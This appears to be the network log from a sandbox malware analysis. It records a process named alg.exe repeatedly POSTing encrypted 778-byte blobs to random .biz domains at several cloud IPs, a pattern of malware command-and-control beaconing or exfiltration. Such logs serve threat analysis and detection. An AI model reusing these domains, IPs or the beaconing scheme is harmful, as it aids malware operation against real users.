                                                                                                                                                                                                                                                                                                                                                                                                                  Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:13.852967024 CET | 778 | OUT | Data Raw: 18 07 48 87 37 92 2d 88 fe 02 00 00 09 d0 ca e3 31 a3 58 44 7a ca c8 92 d6 e1 b0 70 48 9f ed c8 69 58 ac 2f c7 5f 40 de df 24 95 e9 41 8b 20 ad 64 8e ee 58 b6 10 4a 8c d8 3b 4d 5a ce f9 fb 47 d4 58 19 22 77 d0 ab 1d 60 57 20 9e a0 21 ef 90 b4 c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: H7-1XDzpHiX/_@$A dXJ;MZGX"w`W !+wd.64s1TC$7Z52uxQJ>/qUmdmK$n\W2-jn_s7RM0%"4UGzW[d4TBNPmE;\>
Oct 28, 2024 16:51:15.280266047 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b57fab398cf5da72a6d4a90829302016|155.94.241.188|1730130675|1730130675|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
40  192.168.2.5  50015  13.251.16.150  80  2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:51:15.481921911 CET  348  OUT  POST /ohp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:15.481982946 CET  778  OUT  Data Raw: d2 38 e7 2b 97 1a f2 32 fe 02 00 00 66 48 60 a6 b4 9c 14 40 a7 9e 6a 93 4d 55 e3 19 08 d5 c1 38 3a 88 dc 5c 2b 0e 3b 89 e1 d1 75 9d f9 7b a8 cf 30 2a 87 89 28 8c 4c 56 7a 3f 1a 29 7a 89 30 63 e6 0d 34 89 b2 c2 30 a8 90 ad 6a ed 98 a5 fd 64 1b ff
Oct 28, 2024 16:51:16.914385080 CET  417  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=df06495c9c883e14e3ae024f40910d01|155.94.241.188|1730130676|1730130676|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
41  192.168.2.5  50017  34.211.97.45  80  2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:51:17.136723042 CET  347  OUT  POST /ava HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:17.136785030 CET  778  OUT  Data Raw: f2 f8 c3 bb fe 22 9d 63 fe 02 00 00 8c 8d be 2a d5 02 8b db 5b bf 45 cc e6 0e 1a ac ad 53 c0 bd 0a fc c8 76 d3 0c c5 0d 48 9e d0 8e 6f 85 c6 6a 42 86 1d 18 8d 45 89 f2 07 d3 67 d6 ba d8 f6 5b 1d ed f0 2d ef b8 f7 4a f6 e5 eb b6 25 75 9a c9 20 dc
Oct 28, 2024 16:51:19.021253109 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:51:19.022437096 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:51:19.023762941 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.5  50018        47.129.31.212   80                2636  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:19.114883900 CET  349                OUT        POST /xmqlmgb HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: ftxlah.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Oct 28, 2024 16:51:19.114939928 CET  778                OUT        Data Raw: 44 1b df 69 3c a1 44 92 fe 02 00 00 82 7f 0a 74 1d 84 e6 c1 c3 9a 59 17 ad df 73 e3 b0 78 bd c0 b3 48 f2 5e e8 25 be 69 ac bc 6f 02 36 ce 2e 21 ec 0b ae ee 7c 22 24 c2 e9 e0 d1 c5 a9 03 66 2e 98 2d cd 83 10 83 83 66 96 54 f7 12 ca 2a 3c 4e 22 67
                                                                   Data Ascii: Di<DtYsxH^%io6.!|"$f.-fT*<N"gQoFBp"OU%#Sko{czuh%v)Gh(#g4AV_~k[^TbuC~oB}*EBq"}B'5u_^&mT\q Qoqu %3
Oct 28, 2024 16:51:20.666467905 CET  414                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Mon, 28 Oct 2024 15:51:20 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                   Set-Cookie: btst=cbfd2d820016f0c892f4b27ae6c5ed5e|155.94.241.188|1730130680|1730130680|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                   Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                   Data Raw: 30 0d 0a 0d 0a
                                                                   Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.5  50019        13.251.16.150   80                2636  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:20.711174965 CET  345                OUT        POST /os HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: typgfhb.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Oct 28, 2024 16:51:20.711263895 CET  778                OUT        Data Raw: 65 f4 be 2e ea 3d 9c ab fe 02 00 00 80 24 45 f7 82 fe c0 0f e1 22 b2 d1 f3 f4 b0 c8 e1 c6 34 d9 7a a8 4d f8 1f b7 b2 e8 f5 a5 e8 ac 12 31 d2 f5 8f 25 73 1a fd b3 f9 f8 39 08 aa 7a 0b 9a f7 ea da bd 47 f7 ab c0 16 9c 81 89 a9 4a 26 52 26 63 31 14
                                                                   Data Ascii: e.=$E"4zM1%s9zGJ&R&c1<4fOP8i![aFW6ztJ&?HG\c(LDUM<<i#Ecw(wu/BL$xS>evixo T+pQfA[G~`UG
Oct 28, 2024 16:51:22.141578913 CET  415                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Mon, 28 Oct 2024 15:51:21 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                   Set-Cookie: btst=a06737c0bbfe46918bf2ee61305e1177|155.94.241.188|1730130681|1730130681|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                   Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                   Data Raw: 30 0d 0a 0d 0a
                                                                   Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.5  50020        34.211.97.45    80                2636  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:22.354965925 CET  347                OUT        POST /rwiegx HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: esuzf.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Oct 28, 2024 16:51:22.354965925 CET  778                OUT        Data Raw: 85 b5 9a bd 52 46 47 db fe 02 00 00 4e 35 c5 7a e1 bf d6 19 56 8f 7d a7 f2 dc 93 39 47 fa b5 26 c9 64 d4 dc 6f d0 6b 14 36 cf d8 65 a7 1e 2a 12 f4 6c 81 e1 98 42 e1 ec a4 b5 5f 82 72 0c 77 74 7e c0 c3 59 39 44 e5 17 1d 36 f3 e1 c4 e7 03 02 59 20
                                                                   Data Ascii: RFGN5zV}9G&dok6e*lB_rwt~Y9D6Y %\N"2+V1MT-oVo1GUxuxY4uJSvvo8--(*4&(>SSC#c oxw$3o\]%cO$+_&EB
Oct 28, 2024 16:51:23.198287964 CET  413                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Mon, 28 Oct 2024 15:51:23 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                   Set-Cookie: btst=31f5aaf10675ccea18e9f158b032ed9e|155.94.241.188|1730130683|1730130683|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                   Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                   Data Raw: 30 0d 0a 0d 0a
                                                                   Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50021 | 3.94.10.34 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:23.225449085 CET | 359 | OUT | POST /vrhdofwiluexay HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:23.225483894 CET | 778 | OUT | Data Raw: (binary payload)
Oct 28, 2024 16:51:23.939027071 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d7bef593e641c40cb5cd6ad8565e0baf|155.94.241.188|1730130683|1730130683|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50022 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:24.197026968 CET | 355 | OUT | POST /oomorpsdyukh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:24.197052956 CET | 778 | OUT | Data Raw: (binary payload)
Oct 28, 2024 16:51:25.039685965 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8f48227fd87f84ed307ae474cf87c19e|155.94.241.188|1730130684|1730130684|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50023 | 3.254.94.185 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:25.065527916 CET | 342 | OUT | POST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:25.065555096 CET | 778 | OUT | Data Raw: (binary payload)
Oct 28, 2024 16:51:26.040486097 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=0182ec542ccc986bc48b61aad71e0085|155.94.241.188|1730130685|1730130685|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50024 | 85.214.228.140 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:26.085664034 CET | 346 | OUT | POST /og HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:26.085680008 CET | 778 | OUT | Data Raw: f6 81 8f c5 b0 3a ec 54 fe 02 00 00 45 05 68 c7 ce 7e c6 f9 80 60 d7 6a c7 57 3c 84 f1 3d af 8d 4f 00 b2 12 ea 02 32 f0 df 82 75 40 f8 69 18 04 e7 b5 a8 30 18 24 f7 36 c8 00 60 8e d1 78 85 b6 fa c9 2d d4 fa b6 b5 ed 60 04 c0 45 4e 31 b5 b6 4e df
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: :TEh~`jW<=O2u@i0$6`x-`EN1N8xrvn,lnS.w}cLD#Kv/]-dPSL)EGCJGP{R9Goa.[Zr<&O~eds`79'?N 8=Lh
Oct 28, 2024 16:51:26.957945108 CET | 161 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Keep-Alive: timeout=20
Oct 28, 2024 16:51:26.958076000 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 50025 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:27.002204895 CET | 348 | OUT | POST /qmncq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:27.002233982 CET | 778 | OUT | Data Raw: b9 8f 7d 4c 46 97 9c 91 fe 02 00 00 30 c1 32 03 7e 80 8a 7d 79 17 3d b3 e5 d0 b1 0a c2 d6 b3 4b ba 0b 01 f1 ef d6 67 78 64 b2 38 8b 30 15 2f 68 84 f7 21 0e d7 83 f7 5e 50 fb e8 60 4c 19 49 f1 12 cf ec 38 5b 7e 41 14 4b 81 4c eb 73 0e b3 03 ad 3e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: }LF02~}y=Kgxd80/h!^P`LI8[~AKLs>B!~$^,S\[CiXJ]\GN.GWTmH?)ueD$S%X))d83pZqeLf}~^/"nJw4Lj
Oct 28, 2024 16:51:28.444619894 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a84a75e2649846174081033305746396|155.94.241.188|1730130688|1730130688|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 50026 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:28.466916084 CET | 348 | OUT | POST /iboogqv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:28.467176914 CET | 778 | OUT | Data Raw: 76 f0 21 5c 33 45 bb 0a fe 02 00 00 40 a2 1d 21 6a 1c 02 8e 48 bf cb 4f bb 24 c2 ef 5b 20 3c 94 70 c3 ad 0a 91 30 fe 4e 33 fa cb e6 48 3c 32 5e 39 04 72 6d 86 8d a9 58 1d 07 bd 0a 0f ba 52 cc 69 91 ac 32 36 cf 3c 4a 5d 32 d0 b1 46 b8 a0 d5 cb e7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: v!\3E@!jHO$[ <p0N3H<2^9rmXRi26<J]2FD B@Euju\p&Aq8wV#b423fZDr)r1aMg4R-J \M@KK(Qv&OUw~kFrZ\>$'2jz(
Oct 28, 2024 16:51:29.299953938 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b694acb1b35dc654f2824eff545a7bb9|155.94.241.188|1730130689|1730130689|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 50027 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:29.680797100 CET | 353 | OUT | POST /pcwhdleqsuu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680833101 CET778OUTData Raw: ff d7 82 18 03 ea 30 9d fe 02 00 00 34 2d 56 a7 21 07 52 57 64 f6 61 30 11 02 d9 0d b1 0c a6 d6 94 9c 40 6e 64 b3 e8 7c 7f 2b 82 53 12 e9 6d 2a 52 60 85 bd b7 c4 ff 1d 77 f0 03 c5 b3 1f b6 e2 87 48 f8 8a 97 a1 26 98 66 9e 6b 5b 04 6e 42 bb 35 db
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 04-V!RWda0@nd|+Sm*R`wH&fk[nB5u<Lw!L6:xO\^heL@*Pmze(qa\gX1inX5wt@.PJ0i1"NZ#Ye5Z#-cy^!`e'e
Oct 28, 2024 16:51:31.090712070 CET  414                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
